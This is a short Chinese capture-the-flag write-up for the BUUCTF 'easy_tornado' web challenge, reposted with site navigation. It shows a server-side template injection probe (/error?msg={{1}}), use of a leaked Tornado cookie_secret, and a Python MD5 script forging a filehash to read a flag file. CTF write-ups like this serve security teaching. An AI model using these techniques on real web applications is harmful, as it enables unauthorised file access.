CTF-BUUCTF-Web-[护网杯 2018]easy_tornado

其他 2020-03-31 12:24:02 阅读次数: 0

CTF-BUUCTF-Web-[护网杯 2018]easy_tornado

看题:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解题:

1、flag --> 在文件 fllllllllllllag中

2、render()函数渲染 --> 用到SSTI

尝试输入/error?msg={{1}},确实是存在模板注入

render()

SSTI

3、cookie_secret
什么是tornado?
在这里插入图片描述
cookie_secret在哪?

4、解题

cookie_secret --> ‘43998eab-5931-4776-9249-7827c85788e2’

filename --> /fllllllllllllag

payload --> file?filename=/fllllllllllllag&filehash=0cd840b7bb1ba8f2ec7342eb5fab94b8

md5:

# -*- coding: UTF-8 -*-
import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = '43998eab-5931-4776-9249-7827c85788e2'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()

在这里插入图片描述

在这里插入图片描述

想学点black技术
发布了40 篇原创文章 · 获赞 2 · 访问量 2414
私信 关注

猜你喜欢

转载自blog.csdn.net/qq_42404383/article/details/103758145
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
Java自定义时间格式
同步整形电路
在开发中最最最常用的字符串的属性大集合
Linux 查看端口占用并杀掉
Java基础四:ArrayList
多线程之死锁就是这么简单
mysql 基础命令集
awk 命令详解
Centos6.3编译安装nginx+php步骤
OCR (Optical Character Recognition,光学字符识别)
每日归档
更多
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022